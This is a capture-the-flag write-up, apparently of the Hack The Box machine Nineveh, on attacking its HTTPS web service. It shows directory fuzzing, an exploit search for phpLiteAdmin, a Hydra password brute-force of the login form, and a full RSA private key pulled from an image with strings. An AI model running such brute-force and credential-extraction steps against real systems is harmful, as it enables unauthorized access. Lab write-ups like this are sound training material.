InfoSec LAB

Nineveh_Web_443

Created: 4 min read

Web

Nmap Nineveh a web server on the target port 443

Webroot

Fuzzing

┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u https://$IP/FUZZ -ic -e .txt,.php,.html
________________________________________________
 :: Method           : GET
 :: URL              : https://10.10.10.43/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Extensions       : .txt .php .html 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
index.html              [Status: 200, Size: 49, Words: 3, Lines: 2, Duration: 31ms]
db                      [Status: 301, Size: 309, Words: 20, Lines: 10, Duration: 34ms]
secure_notes            [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 179ms]
:: Progress: [882188/882188] :: Job [1/1] :: 576 req/sec :: Duration: [0:31:51] :: Errors: 0 ::

ffuf discovered 2 directories

/db/

it’s a login page to phpliteadmin There is the version information; 1.9 It also somewhat indicates the installation directory of the web application;

This might be what was mentioned in the note earlier regarding DB interface improvement

┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ searchsploit phpliteadmin 1.9
------------------------------------------------ ---------------------------------
 Exploit Title                                  |  Path
------------------------------------------------ ---------------------------------
PHPLiteAdmin 1.9.3 - Remote PHP Code Injection  | php/webapps/24044.txt
phpLiteAdmin 1.9.6 - Multiple Vulnerabilities   | php/webapps/39714.txt
------------------------------------------------ ---------------------------------
shellcodes: No Results
papers: No Results

searchsploit listed 2 items for PHPLiteAdmin 1.9

The first one seems quite promising whereas the second one contains a list of XSS and HTML injections It would still require authentication

Brute-forcing with Hydra

┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ hydra -l '' -P /usr/share/wordlists/rockyou.txt 'https-post-form://10.10.10.43:443/db/index.php:password=^PASS^&login=Log+In&proc_login=true:F=Incorrect password.'
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-16 23:51:34
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-forms://10.10.10.43:443/db/index.php:password=^PASS^&login=Log+In&proc_login=true:F=Incorrect password.
[443][http-post-form] host: 10.10.10.43   password: password123

Password found; password123

Admin Panel

I logged-in to the admin GUI panel

/secure_notes/nineveh.png

Heading over to /secure_notes/ reveals an image. This looks much like the secret folder mentioned in the note

┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ curl -s --insecure https://10.10.10.43/secure_notes/nineveh.png -o nineveh.png

I will download the image with curl

Metadata

┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ exiftool nineveh.png
exiftool version number         : 12.54
file name                       : nineveh.png
directory                       : .
file size                       : 2.9 MB
file modification date/time     : 2022:10:17 02:05:46+02:00
file access date/time           : 2022:10:17 23:42:34+02:00
file inode change date/time     : 2022:10:17 23:42:34+02:00
file permissions                : -rw-r--r--
file type                       : PNG
file type extension             : png
mime type                       : image/png
image width                     : 1497
image height                    : 746
bit depth                       : 8
color type                      : RGB
compression                     : Deflate/Inflate
filter                          : Adaptive
interlace                       : Noninterlaced
significant bits                : 8 8 8
software                        : Shutter
warning                         : [minor] Trailer data after PNG IEND chunk
image size                      : 1497x746
megapixels                      : 1.1

Checking it with exiftool, it doesn’t look any special

strings

┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ strings nineveh.png
IHDR
sBIT
tEXtSoftware
Shutterc
 
[...REDACTED...]
 
secret/
0000755
0000041
0000041
00000000000
13126060277
012377
ustar  
www-data
www-data
secret/nineveh.priv
0000600
0000041
0000041
00000003213
13126045656
014730
ustar  
www-data
www-data
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAri9EUD7bwqbmEsEpIeTr2KGP/wk8YAR0Z4mmvHNJ3UfsAhpI
H9/Bz1abFbrt16vH6/jd8m0urg/Em7d/FJncpPiIH81JbJ0pyTBvIAGNK7PhaQXU
PdT9y0xEEH0apbJkuknP4FH5Zrq0nhoDTa2WxXDcSS1ndt/M8r+eTHx1bVznlBG5
FQq1/wmB65c8bds5tETlacr/15Ofv1A2j+vIdggxNgm8A34xZiP/WV7+7mhgvcnI
3oqwvxCI+VGhQZhoV9Pdj4+D4l023Ub9KyGm40tinCXePsMdY4KOLTR/z+oj4sQT
X+/1/xcl61LADcYk0Sw42bOb+yBEyc1TTq1NEQIDAQABAoIBAFvDbvvPgbr0bjTn
KiI/FbjUtKWpWfNDpYd+TybsnbdD0qPw8JpKKTJv79fs2KxMRVCdlV/IAVWV3QAk
FYDm5gTLIfuPDOV5jq/9Ii38Y0DozRGlDoFcmi/mB92f6s/sQYCarjcBOKDUL58z
GRZtIwb1RDgRAXbwxGoGZQDqeHqaHciGFOugKQJmupo5hXOkfMg/G+Ic0Ij45uoR
JZecF3lx0kx0Ay85DcBkoYRiyn+nNgr/APJBXe9Ibkq4j0lj29V5dT/HSoF17VWo
9odiTBWwwzPVv0i/JEGc6sXUD0mXevoQIA9SkZ2OJXO8JoaQcRz628dOdukG6Utu
Bato3bkCgYEA5w2Hfp2Ayol24bDejSDj1Rjk6REn5D8TuELQ0cffPujZ4szXW5Kb
ujOUscFgZf2P+70UnaceCCAPNYmsaSVSCM0KCJQt5klY2DLWNUaCU3OEpREIWkyl
1tXMOZ/T5fV8RQAZrj1BMxl+/UiV0IIbgF07sPqSA/uNXwx2cLCkhucCgYEAwP3b
vCMuW7qAc9K1Amz3+6dfa9bngtMjpr+wb+IP5UKMuh1mwcHWKjFIF8zI8CY0Iakx
DdhOa4x+0MQEtKXtgaADuHh+NGCltTLLckfEAMNGQHfBgWgBRS8EjXJ4e55hFV89
P+6+1FXXA1r/Dt/zIYN3Vtgo28mNNyK7rCr/pUcCgYEAgHMDCp7hRLfbQWkksGzC
fGuUhwWkmb1/ZwauNJHbSIwG5ZFfgGcm8ANQ/Ok2gDzQ2PCrD2Iizf2UtvzMvr+i
tYXXuCE4yzenjrnkYEXMmjw0V9f6PskxwRemq7pxAPzSk0GVBUrEfnYEJSc/MmXC
iEBMuPz0RAaK93ZkOg3Zya0CgYBYbPhdP5FiHhX0+7pMHjmRaKLj+lehLbTMFlB1
MxMtbEymigonBPVn56Ssovv+bMK+GZOMUGu+A2WnqeiuDMjB99s8jpjkztOeLmPh
PNilsNNjfnt/G3RZiq1/Uc+6dFrvO/AIdw+goqQduXfcDOiNlnr7o5c0/Shi9tse
i6UOyQKBgCgvck5Z1iLrY1qO5iZ3uVr4pqXHyG8ThrsTffkSVrBKHTmsXgtRhHoc
il6RYzQV/2ULgUBfAwdZDNtGxbu5oIUB938TCaLsHFDK6mSTbvB/DywYYScAWwF7
fw4LVXdQMjNJC3sn3JaqY1zJkE4jXlZeNQvCx4ZadtdJD9iO+EUG
-----END RSA PRIVATE KEY-----
secret/nineveh.pub
0000644
0000041
0000041
00000000620
13126060277
014541
ustar  
www-data
www-data
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuL0RQPtvCpuYSwSkh5OvYoY//CTxgBHRniaa8c0ndR+wCGkgf38HPVpsVuu3Xq8fr+N3ybS6uD8Sbt38Umdyk+IgfzUlsnSnJMG8gAY0rs+FpBdQ91P3LTEQQfRqlsmS6Sc/gUflmurSeGgNNrZbFcNxJLWd238zyv55MfHVtXOeUEbkVCrX/CYHrlzxt2zm0ROVpyv/Xk5+/UDaP68h2CDE2CbwDfjFmI/9ZXv7uaGC9ycjeirC/EIj5UaFBmGhX092Pj4PiXTbdRv0rIabjS2KcJd4+wx1jgo4tNH/P6iPixBNf7/X/FyXrUsANxiTRLDjZs5v7IETJzVNOrU0R amrois@nineveh.htb

It becomes special when I pull out ASCII strings with the strings command It contains SSH private key for the amrois user

┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ nano id_rsa.amrois    
┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ chmod 600 id_rsa.amrois

I saved the key bit and set its permission to 600 for SSH use The problem is that there is no SSH server to connect to.

Interactive Graph View

Backlinks